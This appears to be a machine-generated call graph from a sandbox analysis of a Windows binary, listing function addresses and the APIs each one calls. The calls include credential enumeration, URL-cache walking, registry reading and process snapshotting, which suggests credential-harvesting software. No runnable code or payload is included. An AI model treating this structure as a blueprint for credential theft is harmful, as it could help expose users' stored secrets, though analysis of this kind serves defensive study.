38026 40aa14 38025->38026 38027 40aa0a ??3@YAXPAX 38025->38027 38026->37957 38027->38026 38029 40a8eb 38028->38029 38030 40a8df wcslen 38028->38030 38031 40a906 ??3@YAXPAX 38029->38031 38032 40a90f 38029->38032 38030->38029 38033 40a919 38031->38033 38034 4099f4 3 API calls 38032->38034 38035 40a932 38033->38035 38036 40a929 ??3@YAXPAX 38033->38036 38034->38033 38038 4099f4 3 API calls 38035->38038 38037 40a93e memcpy 38036->38037 38037->37950 38039 40a93d 38038->38039 38039->38037 38041 409a41 38040->38041 38042 4099fb malloc 38040->38042 38041->37950 38044 409a37 38042->38044 38045 409a1c 38042->38045 38044->37950 38046 409a30 ??3@YAXPAX 38045->38046 38047 409a20 memcpy 38045->38047 38046->38044 38047->38046 38049 40a9e7 38048->38049 38050 40a9dc ??3@YAXPAX 38048->38050 38052 4099f4 3 API calls 38049->38052 38051 40a9f2 38050->38051 38051->37955 38052->38051 38077 409bca GetModuleFileNameW 38053->38077 38055 40dce6 wcsrchr 38056 40dcf5 38055->38056 38057 40dcf9 wcscat 38055->38057 38056->38057 38057->37963 38078 44db70 38058->38078 38062 40dbfd 38081 4447d9 38062->38081 38065 40dc34 wcscpy wcscpy 38107 40d6f5 38065->38107 38066 40dc1f wcscpy 38066->38065 38069 40d6f5 3 API calls 38070 40dc73 38069->38070 38071 40d6f5 3 API calls 38070->38071 38072 40dc89 38071->38072 38073 40d6f5 3 API calls 38072->38073 38074 40dc9c EnumResourceNamesW EnumResourceNamesW wcscpy 38073->38074 38113 40da80 38074->38113 38077->38055 38079 40dbb4 memset memset 38078->38079 38080 409bca GetModuleFileNameW 38079->38080 38080->38062 38083 4447f4 38081->38083 38082 40dc1b 38082->38065 38082->38066 38083->38082 38084 444807 ??2@YAPAXI 38083->38084 38085 44481f 38084->38085 38086 444873 _snwprintf 38085->38086 38087 4448ab wcscpy 38085->38087 38120 44474a 8 API calls 38086->38120 38089 4448bb 38087->38089 38121 44474a 8 API calls 38089->38121 38090 4448a7 38090->38087 38090->38089 38092 4448cd 38122 44474a 8 API calls 38092->38122 38094 4448e2 38123 44474a 8 API calls 38094->38123 38096 4448f7 38124 44474a 8 API calls 38096->38124 38098 44490c 38125 44474a 8 API calls 38098->38125 38100 444921 38126 44474a 8 API calls 38100->38126 38102 444936 38127 44474a 8 API calls 38102->38127 38104 44494b 38128 44474a 8 API calls 38104->38128 38106 444960 ??3@YAXPAX 38106->38082 38108 44db70 38107->38108 38109 40d702 memset GetPrivateProfileStringW 38108->38109 38110 40d752 38109->38110 38111 40d75c WritePrivateProfileStringW 38109->38111 38110->38111 38112 40d758 38110->38112 38111->38112 38112->38069 38114 44db70 38113->38114 38115 40da8d memset 38114->38115 38116 40daac LoadStringW 38115->38116 38117 40dac6 38116->38117 38117->38116 38119 40dade 38117->38119 38129 40d76e memset GetPrivateProfileStringW WritePrivateProfileStringW memset _itow 38117->38129 38119->37891 38120->38090 38121->38092 38122->38094 38123->38096 38124->38098 38125->38100 38126->38102 38127->38104 38128->38106 38129->38117 38140 409b98 GetFileAttributesW 38130->38140 38132 40daea 38133 40db63 38132->38133 38134 40daef wcscpy wcscpy GetPrivateProfileIntW 38132->38134 38133->37893 38141 40d65d GetPrivateProfileStringW 38134->38141 38136 40db3e 38142 40d65d GetPrivateProfileStringW 38136->38142 38138 40db4f 38143 40d65d GetPrivateProfileStringW 38138->38143 38140->38132 38141->38136 38142->38138 38143->38133 38179 40eaff 38144->38179 38148 411ae2 memset 38147->38148 38149 411b8f 38147->38149 38219 409bca GetModuleFileNameW 38148->38219 38161 411a8b 38149->38161 38151 411b0a wcsrchr 38152 411b22 wcscat 38151->38152 38153 411b1f 38151->38153 38220 414770 wcscpy wcscpy wcscpy CreateFileW CloseHandle 38152->38220 38153->38152 38155 411b67 38221 402afb 38155->38221 38159 411b7f 38277 40ea13 SendMessageW memset SendMessageW 38159->38277 38162 402afb 27 API calls 38161->38162 38163 411ac0 38162->38163 38164 4110dc 38163->38164 38165 41113e 38164->38165 38170 4110f0 38164->38170 38302 40969c LoadCursorW SetCursor 38165->38302 38167 411143 38303 4032b4 38167->38303 38321 444a54 38167->38321 38168 4110f7 _wcsicmp 38168->38170 38169 411157 38171 40ada2 _wcsicmp 38169->38171 38170->38165 38170->38168 38324 410c46 10 API calls 38170->38324 38174 411167 38171->38174 38172 4111af 38174->38172 38175 4111a6 qsort 38174->38175 38175->38172 38178->37975 38180 40eb10 38179->38180 38192 40e8e0 38180->38192 38183 40eb6c memcpy memcpy 38184 40ebb7 38183->38184 38184->38183 38185 40ebf2 ??2@YAPAXI ??2@YAPAXI 38184->38185 38188 40d134 16 API calls 38184->38188 38186 40ec2e ??2@YAPAXI 38185->38186 38189 40ec65 38185->38189 38186->38189 38188->38184 38189->38189 38202 40ea7f 38189->38202 38191 402f49 38191->37975 38193 40e8f2 38192->38193 38194 40e8eb ??3@YAXPAX 38192->38194 38195 40e900 38193->38195 38196 40e8f9 ??3@YAXPAX 38193->38196 38194->38193 38197 40e911 38195->38197 38198 40e90a ??3@YAXPAX 38195->38198 38196->38195 38199 40e931 ??2@YAPAXI ??2@YAPAXI 38197->38199 38200 40e921 ??3@YAXPAX 38197->38200 38201 40e92a ??3@YAXPAX 38197->38201 38198->38197 38199->38183 38200->38201 38201->38199 38203 40aa04 ??3@YAXPAX 38202->38203 38204 40ea88 38203->38204 38205 40aa04 ??3@YAXPAX 38204->38205 38206 40ea90 38205->38206 38207 40aa04 ??3@YAXPAX 38206->38207 38208 40ea98 38207->38208 38209 40aa04 ??3@YAXPAX 38208->38209 38210 40eaa0 38209->38210 38211 40a9ce 4 API calls 38210->38211 38212 40eab3 38211->38212 38213 40a9ce 4 API calls 38212->38213 38214 40eabd 38213->38214 38215 40a9ce 4 API calls 38214->38215 38216 40eac7 38215->38216 38217 40a9ce 4 API calls 38216->38217 38218 40ead1 38217->38218 38218->38191 38219->38151 38220->38155 38278 40b2cc 38221->38278 38223 402b0a 38224 40b2cc 27 API calls 38223->38224 38225 402b23 38224->38225 38226 40b2cc 27 API calls 38225->38226 38227 402b3a 38226->38227 38228 40b2cc 27 API calls 38227->38228 38229 402b54 38228->38229 38230 40b2cc 27 API calls 38229->38230 38231 402b6b 38230->38231 38232 40b2cc 27 API calls 38231->38232 38233 402b82 38232->38233 38234 40b2cc 27 API calls 38233->38234 38235 402b99 38234->38235 38236 40b2cc 27 API calls 38235->38236 38237 402bb0 38236->38237 38238 40b2cc 27 API calls 38237->38238 38239 402bc7 38238->38239 38240 40b2cc 27 API calls 38239->38240 38241 402bde 38240->38241 38242 40b2cc 27 API calls 38241->38242 38243 402bf5 38242->38243 38244 40b2cc 27 API calls 38243->38244 38245 402c0c 38244->38245 38246 40b2cc 27 API calls 38245->38246 38247 402c23 38246->38247 38248 40b2cc 27 API calls 38247->38248 38249 402c3a 38248->38249 38250 40b2cc 27 API calls 38249->38250 38251 402c51 38250->38251 38252 40b2cc 27 API calls 38251->38252 38253 402c68 38252->38253 38254 40b2cc 27 API calls 38253->38254 38255 402c7f 38254->38255 38256 40b2cc 27 API calls 38255->38256 38257 402c99 38256->38257 38258 40b2cc 27 API calls 38257->38258 38259 402cb3 38258->38259 38260 40b2cc 27 API calls 38259->38260 38261 402cd5 38260->38261 38262 40b2cc 27 API calls 38261->38262 38263 402cf0 38262->38263 38264 40b2cc 27 API calls 38263->38264 38265 402d0b 38264->38265 38266 40b2cc 27 API calls 38265->38266 38267 402d26 38266->38267 38268 40b2cc 27 API calls 38267->38268 38269 402d3e 38268->38269 38270 40b2cc 27 API calls 38269->38270 38271 402d59 38270->38271 38272 40b2cc 27 API calls 38271->38272 38273 402d78 38272->38273 38274 40b2cc 27 API calls 38273->38274 38275 402d93 38274->38275 38276 4018db GetWindowPlacement memset GetSystemMetrics GetSystemMetrics SetWindowPlacement 38275->38276 38276->38159 38277->38149 38281 40b58d 38278->38281 38280 40b2d1 38280->38223 38282 40b5a4 GetModuleHandleW FindResourceW 38281->38282 38283 40b62e 38281->38283 38284 40b5c2 LoadResource 38282->38284 38286 40b5e7 38282->38286 38283->38280 38285 40b5d0 SizeofResource LockResource 38284->38285 38284->38286 38285->38286 38286->38283 38294 40afcf 38286->38294 38288 40b608 memcpy 38297 40b4d3 memcpy 38288->38297 38290 40b61e 38298 40b3c1 18 API calls 38290->38298 38292 40b626 38299 40b04b 38292->38299 38295 40b04b ??3@YAXPAX 38294->38295 38296 40afd7 ??2@YAPAXI 38295->38296 38296->38288 38297->38290 38298->38292 38300 40b051 ??3@YAXPAX 38299->38300 38301 40b05f 38299->38301 38300->38301 38301->38283 38302->38167 38304 4032c4 38303->38304 38305 40b633 ??3@YAXPAX 38304->38305 38306 403316 38305->38306 38325 44553b 38306->38325 38310 403480 38521 40368c 15 API calls 38310->38521 38312 403489 38313 40b633 ??3@YAXPAX 38312->38313 38314 403495 38313->38314 38314->38169 38315 4033a9 memset memcpy 38316 4033ec wcscmp 38315->38316 38317 40333c 38315->38317 38316->38317 38317->38310 38317->38315 38317->38316 38519 4028e7 11 API calls 38317->38519 38520 40f508 6 API calls 38317->38520 38319 403421 _wcsicmp 38319->38317 38322 444a64 FreeLibrary 38321->38322 38323 444a83 38321->38323 38322->38323 38323->38169 38324->38170 38326 445548 38325->38326 38327 445599 38326->38327 38522 40c768 38326->38522 38328 4455a8 memset 38327->38328 38335 4457f2 38327->38335 38605 403988 38328->38605 38339 445854 38335->38339 38707 403e2d memset memset memset memset memset 38335->38707 38336 445672 38616 403fbe memset memset memset memset memset 38336->38616 38337 4458bb memset memset 38343 414c2e 16 API calls 38337->38343 38388 4458aa 38339->38388 38730 403c9c memset memset memset memset memset 38339->38730 38341 44595e memset memset 38348 414c2e 16 API calls 38341->38348 38342 4455e5 38342->38336 38351 44560f 38342->38351 38344 4458f9 38343->38344 38349 40b2cc 27 API calls 38344->38349 38346 445a00 memset memset 38753 414c2e 38346->38753 38347 445b22 38353 445bca 38347->38353 38354 445b38 memset memset memset 38347->38354 38358 44599c 38348->38358 38359 445909 38349->38359 38350 44557a 38385 44558c 38350->38385 38802 41366b FreeLibrary 38350->38802 38362 4087b3 338 API calls 38351->38362 38352 445849 38817 40b1ab ??3@YAXPAX ??3@YAXPAX 38352->38817 38360 445c8b memset memset 38353->38360 38427 445cf0 38353->38427 38363 445bd4 38354->38363 38364 445b98 38354->38364 38367 40b2cc 27 API calls 38358->38367 38368 409d1f 6 API calls 38359->38368 38371 414c2e 16 API calls 38360->38371 38361 44589f 38818 40b1ab ??3@YAXPAX ??3@YAXPAX 38361->38818 38369 445621 38362->38369 38377 414c2e 16 API calls 38363->38377 38364->38363 38373 445ba2 38364->38373 38370 4459ac 38367->38370 38381 445919 38368->38381 38803 4454bf 20 API calls 38369->38803 38383 409d1f 6 API calls 38370->38383 38384 445cc9 38371->38384 38890 4099c6 wcslen 38373->38890 38374 4456b2 38805 40b1ab ??3@YAXPAX ??3@YAXPAX 38374->38805 38376 40b2cc 27 API calls 38389 445a4f 38376->38389 38391 445be2 38377->38391 38378 403335 38518 4452e5 45 API calls 38378->38518 38379 445d3d 38411 40b2cc 27 API calls 38379->38411 38380 445d88 memset memset memset 38394 414c2e 16 API calls 38380->38394 38819 409b98 GetFileAttributesW 38381->38819 38382 445823 38382->38352 38393 4087b3 338 API calls 38382->38393 38395 4459bc 38383->38395 38396 409d1f 6 API calls 38384->38396 38589 444b06 38385->38589 38386 445879 38386->38361 38407 4087b3 338 API calls 38386->38407 38388->38337 38412 44594a 38388->38412 38768 409d1f wcslen wcslen 38389->38768 38400 40b2cc 27 API calls 38391->38400 38393->38382 38404 445dde 38394->38404 38886 409b98 GetFileAttributesW 38395->38886 38406 445ce1 38396->38406 38397 445bb3 38893 445403 memset 38397->38893 38398 445680 38398->38374 38639 4087b3 memset 38398->38639 38401 445bf3 38400->38401 38410 409d1f 6 API calls 38401->38410 38402 445928 38402->38412 38820 40b6ef 38402->38820 38413 40b2cc 27 API calls 38404->38413 38910 409b98 GetFileAttributesW 38406->38910 38407->38386 38421 445c07 38410->38421 38422 445d54 _wcsicmp 38411->38422 38412->38341 38426 4459ed 38412->38426 38425 445def 38413->38425 38414 4459cb 38414->38426 38435 40b6ef 252 API calls 38414->38435 38418 40b2cc 27 API calls 38419 445a94 38418->38419 38773 40ae18 38419->38773 38420 44566d 38420->38335 38690 413d4c 38420->38690 38431 445389 258 API calls 38421->38431 38432 445d71 38422->38432 38497 445d67 38422->38497 38424 445665 38804 40b1ab ??3@YAXPAX ??3@YAXPAX 38424->38804 38433 409d1f 6 API calls 38425->38433 38426->38346 38426->38347 38427->38378 38427->38379 38427->38380 38428 445389 258 API calls 38428->38353 38437 445c17 38431->38437 38911 445093 23 API calls 38432->38911 38440 445e03 38433->38440 38435->38426 38436 4456d8 38442 40b2cc 27 API calls 38436->38442 38443 40b2cc 27 API calls 38437->38443 38439 44563c 38439->38424 38445 4087b3 338 API calls 38439->38445 38912 409b98 GetFileAttributesW 38440->38912 38441 40b6ef 252 API calls 38441->38378 38447 4456e2 38442->38447 38448 445c23 38443->38448 38444 445d83 38444->38378 38445->38439 38806 413fa6 _wcsicmp _wcsicmp 38447->38806 38452 409d1f 6 API calls 38448->38452 38450 445e12 38457 445e6b 38450->38457 38463 40b2cc 27 API calls 38450->38463 38455 445c37 38452->38455 38453 445aa1 38456 445b17 38453->38456 38471 445ab2 memset 38453->38471 38484 409d1f 6 API calls 38453->38484 38780 40add4 38453->38780 38785 445389 38453->38785 38794 40ae51 38453->38794 38454 4456eb 38459 4456fd memset memset memset memset 38454->38459 38460 4457ea 38454->38460 38461 445389 258 API calls 38455->38461 38887 40aebe 38456->38887 38914 445093 23 API calls 38457->38914 38807 409c70 wcscpy wcsrchr 38459->38807 38810 413d29 38460->38810 38466 445c47 38461->38466 38467 445e33 38463->38467 38473 40b2cc 27 API calls 38466->38473 38474 409d1f 6 API calls 38467->38474 38469 445e7e 38470 445f67 38469->38470 38479 40b2cc 27 API calls 38470->38479 38475 40b2cc 27 API calls 38471->38475 38477 445c53 38473->38477 38478 445e47 38474->38478 38475->38453 38476 409c70 2 API calls 38480 44577e 38476->38480 38481 409d1f 6 API calls 38477->38481 38913 409b98 GetFileAttributesW 38478->38913 38483 445f73 38479->38483 38485 409c70 2 API calls 38480->38485 38486 445c67 38481->38486 38488 409d1f 6 API calls 38483->38488 38484->38453 38489 44578d 38485->38489 38490 445389 258 API calls 38486->38490 38487 445e56 38487->38457 38493 445e83 memset 38487->38493 38491 445f87 38488->38491 38489->38460 38496 40b2cc 27 API calls 38489->38496 38490->38353 38917 409b98 GetFileAttributesW 38491->38917 38495 40b2cc 27 API calls 38493->38495 38498 445eab 38495->38498 38499 4457a8 38496->38499 38497->38378 38497->38441 38500 409d1f 6 API calls 38498->38500 38501 409d1f 6 API calls 38499->38501 38502 445ebf 38500->38502 38503 4457b8 38501->38503 38504 40ae18 9 API calls 38502->38504 38809 409b98 GetFileAttributesW 38503->38809 38514 445ef5 38504->38514 38506 4457c7 38506->38460 38508 4087b3 338 API calls 38506->38508 38507 40ae51 9 API calls 38507->38514 38508->38460 38509 445f5c 38511 40aebe FindClose 38509->38511 38510 40add4 2 API calls 38510->38514 38511->38470 38512 40b2cc 27 API calls 38512->38514 38513 409d1f 6 API calls 38513->38514 38514->38507 38514->38509 38514->38510 38514->38512 38514->38513 38516 445f3a 38514->38516 38915 409b98 GetFileAttributesW 38514->38915 38916 445093 23 API calls 38516->38916 38518->38317 38519->38319 38520->38317 38521->38312 38523 40c775 38522->38523 38918 40b1ab ??3@YAXPAX ??3@YAXPAX 38523->38918 38525 40c788 38919 40b1ab ??3@YAXPAX ??3@YAXPAX 38525->38919 38527 40c790 38920 40b1ab ??3@YAXPAX ??3@YAXPAX 38527->38920 38529 40c798 38530 40aa04 ??3@YAXPAX 38529->38530 38531 40c7a0 38530->38531 38921 40c274 memset 38531->38921 38536 40a8ab 9 API calls 38537 40c7c3 38536->38537 38538 40a8ab 9 API calls 38537->38538 38539 40c7d0 38538->38539 38950 40c3c3 38539->38950 38543 40c877 38552 40bdb0 38543->38552 38544 40c86c 38992 4053fe 39 API calls 38544->38992 38546 40c7e5 38546->38543 38546->38544 38551 40c634 49 API calls 38546->38551 38975 40a706 38546->38975 38551->38546 39182 404363 38552->39182 38555 40bf5d 39202 40440c 38555->39202 38557 40bdee 38557->38555 38560 40b2cc 27 API calls 38557->38560 38558 40bddf CredEnumerateW 38558->38557 38561 40be02 wcslen 38560->38561 38561->38555 38563 40be1e 38561->38563 38562 40be26 _wcsncoll 38562->38563 38563->38555 38563->38562 38566 40be7d memset 38563->38566 38567 40bea7 memcpy 38563->38567 38568 40bf11 wcschr 38563->38568 38569 40b2cc 27 API calls 38563->38569 38571 40bf43 LocalFree 38563->38571 39205 40bd5d 28 API calls 38563->39205 39206 404423 38563->39206 38566->38563 38566->38567 38567->38563 38567->38568 38568->38563 38570 40bef6 _wcsnicmp 38569->38570 38570->38563 38570->38568 38571->38563 38572 4135f7 39219 4135e0 38572->39219 38575 40b2cc 27 API calls 38576 41360d 38575->38576 38577 40a804 8 API calls 38576->38577 38578 413613 38577->38578 38579 41361b 38578->38579 38580 41363e 38578->38580 38581 40b273 27 API calls 38579->38581 38582 4135e0 FreeLibrary 38580->38582 38583 413625 GetProcAddress 38581->38583 38584 413643 38582->38584 38583->38580 38585 413648 38583->38585 38584->38350 38586 413658 38585->38586 38587 4135e0 FreeLibrary 38585->38587 38586->38350 38588 413666 38587->38588 38588->38350 39222 4449b9 38589->39222 38592 444c1f 38592->38327 38593 4449b9 42 API calls 38595 444b4b 38593->38595 38594 444c15 38597 4449b9 42 API calls 38594->38597 38595->38594 39243 444972 GetVersionExW 38595->39243 38597->38592 38598 444b99 memcmp 38603 444b8c 38598->38603 38599 444c0b 39247 444a85 42 API calls 38599->39247 38603->38598 38603->38599 39244 444aa5 42 API calls 38603->39244 39245 40a7a0 GetVersionExW 38603->39245 39246 444a85 42 API calls 38603->39246 38606 40399d 38605->38606 39248 403a16 38606->39248 38608 403a09 39262 40b1ab ??3@YAXPAX ??3@YAXPAX 38608->39262 38610 403a12 wcsrchr 38610->38342 38611 4039a3 38611->38608 38614 4039f4 38611->38614 39259 40a02c CreateFileW 38611->39259 38614->38608 38615 4099c6 2 API calls 38614->38615 38615->38608 38617 414c2e 16 API calls 38616->38617 38618 404048 38617->38618 38619 414c2e 16 API calls 38618->38619 38620 404056 38619->38620 38621 409d1f 6 API calls 38620->38621 38622 404073 38621->38622 38623 409d1f 6 API calls 38622->38623 38624 40408e 38623->38624 38625 409d1f 6 API calls 38624->38625 38626 4040a6 38625->38626 38627 403af5 20 API calls 38626->38627 38628 4040ba 38627->38628 38629 403af5 20 API calls 38628->38629 38630 4040cb 38629->38630 39289 40414f memset 38630->39289 38632 404140 39303 40b1ab ??3@YAXPAX ??3@YAXPAX 38632->39303 38634 4040ec memset 38637 4040e0 38634->38637 38635 404148 38635->38398 38636 4099c6 2 API calls 38636->38637 38637->38632 38637->38634 38637->38636 38638 40a8ab 9 API calls 38637->38638 38638->38637 39316 40a6e6 WideCharToMultiByte 38639->39316 38641 4087ed 39317 4095d9 memset 38641->39317 38644 408953 38644->38398 38645 408809 memset memset memset memset memset 38646 40b2cc 27 API calls 38645->38646 38647 4088a1 38646->38647 38648 409d1f 6 API calls 38647->38648 38649 4088b1 38648->38649 38650 40b2cc 27 API calls 38649->38650 38651 4088c0 38650->38651 38652 409d1f 6 API calls 38651->38652 38653 4088d0 38652->38653 38654 40b2cc 27 API calls 38653->38654 38655 4088df 38654->38655 38656 409d1f 6 API calls 38655->38656 38657 4088ef 38656->38657 38658 40b2cc 27 API calls 38657->38658 38659 4088fe 38658->38659 38660 409d1f 6 API calls 38659->38660 38661 40890e 38660->38661 38662 40b2cc 27 API calls 38661->38662 38663 40891d 38662->38663 38664 409d1f 6 API calls 38663->38664 38665 40892d 38664->38665 39336 409b98 GetFileAttributesW 38665->39336 38667 40893e 38668 408943 38667->38668 38669 408958 38667->38669 39337 407fdf 75 API calls 38668->39337 39338 409b98 GetFileAttributesW 38669->39338 38672 408964 38673 408969 38672->38673 38674 40897b 38672->38674 39339 4082c7 199 API calls 38673->39339 39340 409b98 GetFileAttributesW 38674->39340 38691 40b633 ??3@YAXPAX 38690->38691 38692 413d65 CreateToolhelp32Snapshot memset Process32FirstW 38691->38692 38693 413f00 Process32NextW 38692->38693 38694 413da5 OpenProcess 38693->38694 38695 413f17 CloseHandle 38693->38695 38696 413df3 memset 38694->38696 38701 413eb0 38694->38701 38695->38436 39628 413f27 38696->39628 38698 413ebf ??3@YAXPAX 38698->38701 38699 4099f4 3 API calls 38699->38701 38701->38693 38701->38698 38701->38699 38702 413e37 GetModuleHandleW 38703 413e1f 38702->38703 38704 413e46 GetProcAddress 38702->38704 38703->38702 39633 413959 38703->39633 39649 413ca4 38703->39649 38704->38703 38706 413ea2 CloseHandle 38706->38701 38708 414c2e 16 API calls 38707->38708 38709 403eb7 38708->38709 38710 414c2e 16 API calls 38709->38710 38711 403ec5 38710->38711 38712 409d1f 6 API calls 38711->38712 38713 403ee2 38712->38713 38714 409d1f 6 API calls 38713->38714 38715 403efd 38714->38715 38716 409d1f 6 API calls 38715->38716 38717 403f15 38716->38717 38718 403af5 20 API calls 38717->38718 38719 403f29 38718->38719 38720 403af5 20 API calls 38719->38720 38721 403f3a 38720->38721 38722 40414f 33 API calls 38721->38722 38723 403f4f 38722->38723 38724 403faf 38723->38724 38726 403f5b memset 38723->38726 38728 4099c6 2 API calls 38723->38728 38729 40a8ab 9 API calls 38723->38729 39663 40b1ab ??3@YAXPAX ??3@YAXPAX 38724->39663 38726->38723 38727 403fb7 38727->38382 38728->38723 38729->38723 38731 414c2e 16 API calls 38730->38731 38732 403d26 38731->38732 38733 414c2e 16 API calls 38732->38733 38734 403d34 38733->38734 38735 409d1f 6 API calls 38734->38735 38736 403d51 38735->38736 38737 409d1f 6 API calls 38736->38737 38738 403d6c 38737->38738 38739 409d1f 6 API calls 38738->38739 38740 403d84 38739->38740 38741 403af5 20 API calls 38740->38741 38742 403d98 38741->38742 38743 403af5 20 API calls 38742->38743 38744 403da9 38743->38744 38745 40414f 33 API calls 38744->38745 38746 403dbe 38745->38746 38747 403e1e 38746->38747 38748 403dca memset 38746->38748 38751 4099c6 2 API calls 38746->38751 38752 40a8ab 9 API calls 38746->38752 39664 40b1ab ??3@YAXPAX ??3@YAXPAX 38747->39664 38748->38746 38750 403e26 38750->38386 38751->38746 38752->38746 38754 414b81 9 API calls 38753->38754 38755 414c40 38754->38755 38756 414c73 memset 38755->38756 39665 409cea 38755->39665 38757 414c94 38756->38757 39668 414592 RegOpenKeyExW 38757->39668 38760 414c64 38760->38376 38762 414cc1 38763 414cf4 wcscpy 38762->38763 39669 414bb0 wcscpy 38762->39669 38763->38760 38765 414cd2 39670 4145ac RegQueryValueExW 38765->39670 38767 414ce9 RegCloseKey 38767->38763 38769 409d62 38768->38769 38770 409d43 wcscpy 38768->38770 38769->38418 38771 409719 2 API calls 38770->38771 38772 409d51 wcscat 38771->38772 38772->38769 38774 40aebe FindClose 38773->38774 38775 40ae21 38774->38775 38776 4099c6 2 API calls 38775->38776 38777 40ae35 38776->38777 38778 409d1f 6 API calls 38777->38778 38779 40ae49 38778->38779 38779->38453 38781 40ade0 38780->38781 38782 40ae0f 38780->38782 38781->38782 38783 40ade7 wcscmp 38781->38783 38782->38453 38783->38782 38784 40adfe wcscmp 38783->38784 38784->38782 38786 40ae18 9 API calls 38785->38786 38792 4453c4 38786->38792 38787 40ae51 9 API calls 38787->38792 38788 4453f3 38790 40aebe FindClose 38788->38790 38789 40add4 2 API calls 38789->38792 38791 4453fe 38790->38791 38791->38453 38792->38787 38792->38788 38792->38789 38793 445403 253 API calls 38792->38793 38793->38792 38795 40ae7b FindNextFileW 38794->38795 38796 40ae5c FindFirstFileW 38794->38796 38797 40ae94 38795->38797 38798 40ae8f 38795->38798 38796->38797 38800 40aeb6 38797->38800 38801 409d1f 6 API calls 38797->38801 38799 40aebe FindClose 38798->38799 38799->38797 38800->38453 38801->38800 38802->38385 38803->38439 38804->38420 38805->38420 38806->38454 38808 409c89 38807->38808 38808->38476 38809->38506 38811 413d39 38810->38811 38812 413d2f FreeLibrary 38810->38812 38813 40b633 ??3@YAXPAX 38811->38813 38812->38811 38814 413d42 38813->38814 38815 40b633 ??3@YAXPAX 38814->38815 38816 413d4a 38815->38816 38816->38335 38817->38339 38818->38388 38819->38402 38821 44db70 38820->38821 38822 40b6fc memset 38821->38822 38823 409c70 2 API calls 38822->38823 38824 40b732 wcsrchr 38823->38824 38825 40b743 38824->38825 38826 40b746 memset 38824->38826 38825->38826 38827 40b2cc 27 API calls 38826->38827 38828 40b76f 38827->38828 38829 409d1f 6 API calls 38828->38829 38830 40b783 38829->38830 39671 409b98 GetFileAttributesW 38830->39671 38832 40b792 38833 40b7c2 38832->38833 38834 409c70 2 API calls 38832->38834 39672 40bb98 38833->39672 38836 40b7a5 38834->38836 38838 40b2cc 27 API calls 38836->38838 38842 40b7b2 38838->38842 38839 40b837 FindCloseChangeNotification 38841 40b83e memset 38839->38841 38840 40b817 39706 409a45 GetTempPathW 38840->39706 39705 40a6e6 WideCharToMultiByte 38841->39705 38845 409d1f 6 API calls 38842->38845 38845->38833 38846 40b827 CopyFileW 38846->38841 38847 40b866 38848 444432 121 API calls 38847->38848 38849 40b879 38848->38849 38850 40bad5 38849->38850 38851 40b273 27 API calls 38849->38851 38852 40baeb 38850->38852 38853 40bade DeleteFileW 38850->38853 38854 40b89a 38851->38854 38855 40b04b ??3@YAXPAX 38852->38855 38853->38852 38856 438552 134 API calls 38854->38856 38857 40baf3 38855->38857 38858 40b8a4 38856->38858 38857->38412 38859 40bacd 38858->38859 38861 4251c4 137 API calls 38858->38861 38860 443d90 111 API calls 38859->38860 38860->38850 38884 40b8b8 38861->38884 38862 40bac6 39718 424f26 123 API calls 38862->39718 38863 40b8bd memset 39709 425413 17 API calls 38863->39709 38866 425413 17 API calls 38866->38884 38869 40a71b MultiByteToWideChar 38869->38884 38870 40a734 MultiByteToWideChar 38870->38884 38873 40b9b5 memcmp 38873->38884 38874 4099c6 2 API calls 38874->38884 38875 404423 37 API calls 38875->38884 38877 40bb3e memset memcpy 39719 40a734 MultiByteToWideChar 38877->39719 38878 4251c4 137 API calls 38878->38884 38881 40bb88 LocalFree 38881->38884 38884->38862 38884->38863 38884->38866 38884->38869 38884->38870 38884->38873 38884->38874 38884->38875 38884->38877 38884->38878 38885 40ba5f memcmp 38884->38885 39710 4253ef 16 API calls 38884->39710 39711 40b64c SystemTimeToFileTime FileTimeToLocalFileTime 38884->39711 39712 4253af 17 API calls 38884->39712 39713 4253cf 17 API calls 38884->39713 39714 447280 memset 38884->39714 39715 447960 memset memcpy memcpy memcpy 38884->39715 39716 40afe8 ??2@YAPAXI memcpy ??3@YAXPAX 38884->39716 39717 447920 memcpy memcpy memcpy 38884->39717 38885->38884 38886->38414 38888 40aed1 38887->38888 38889 40aec7 FindClose 38887->38889 38888->38347 38889->38888 38891 4099d7 38890->38891 38892 4099da memcpy 38890->38892 38891->38892 38892->38397 38894 40b2cc 27 API calls 38893->38894 38895 44543f 38894->38895 38896 409d1f 6 API calls 38895->38896 38897 44544f 38896->38897 39806 409b98 GetFileAttributesW 38897->39806 38899 44545e 38900 445476 38899->38900 38901 40b6ef 252 API calls 38899->38901 38902 40b2cc 27 API calls 38900->38902 38901->38900 38903 445482 38902->38903 38904 409d1f 6 API calls 38903->38904 38905 445492 38904->38905 39807 409b98 GetFileAttributesW 38905->39807 38907 4454a1 38908 4454b9 38907->38908 38909 40b6ef 252 API calls 38907->38909 38908->38428 38909->38908 38910->38427 38911->38444 38912->38450 38913->38487 38914->38469 38915->38514 38916->38514 38917->38497 38918->38525 38919->38527 38920->38529 38922 414c2e 16 API calls 38921->38922 38923 40c2ae 38922->38923 38993 40c1d3 38923->38993 38928 40c3be 38945 40a8ab 38928->38945 38929 40afcf 2 API calls 38930 40c2fd FindFirstUrlCacheEntryW 38929->38930 38931 40c3b6 38930->38931 38932 40c31e wcschr 38930->38932 38933 40b04b ??3@YAXPAX 38931->38933 38934 40c331 38932->38934 38935 40c35e FindNextUrlCacheEntryW 38932->38935 38933->38928 38936 40a8ab 9 API calls 38934->38936 38935->38932 38937 40c373 GetLastError 38935->38937 38940 40c33e wcschr 38936->38940 38938 40c3ad FindCloseUrlCache 38937->38938 38939 40c37e 38937->38939 38938->38931 38941 40afcf 2 API calls 38939->38941 38940->38935 38942 40c34f 38940->38942 38943 40c391 FindNextUrlCacheEntryW 38941->38943 38944 40a8ab 9 API calls 38942->38944 38943->38932 38943->38938 38944->38935 39109 40a97a 38945->39109 38948 40a8cc 38948->38536 38949 40a8d0 7 API calls 38949->38948 39114 40b1ab ??3@YAXPAX ??3@YAXPAX 38950->39114 38952 40c3dd 38953 40b2cc 27 API calls 38952->38953 38954 40c3e7 38953->38954 39115 414592 RegOpenKeyExW 38954->39115 38956 40c3f4 38957 40c50e 38956->38957 38958 40c3ff 38956->38958 38972 405337 38957->38972 38959 40a9ce 4 API calls 38958->38959 38960 40c418 memset 38959->38960 39116 40aa1d 38960->39116 38963 40c471 38965 40c47a _wcsupr 38963->38965 38964 40c505 RegCloseKey 38964->38957 38966 40a8d0 7 API calls 38965->38966 38967 40c498 38966->38967 38968 40a8d0 7 API calls 38967->38968 38969 40c4ac memset 38968->38969 38970 40aa1d 38969->38970 38971 40c4e4 RegEnumValueW 38970->38971 38971->38964 38971->38965 39118 405220 38972->39118 38976 4099c6 2 API calls 38975->38976 38977 40a714 _wcslwr 38976->38977 38978 40c634 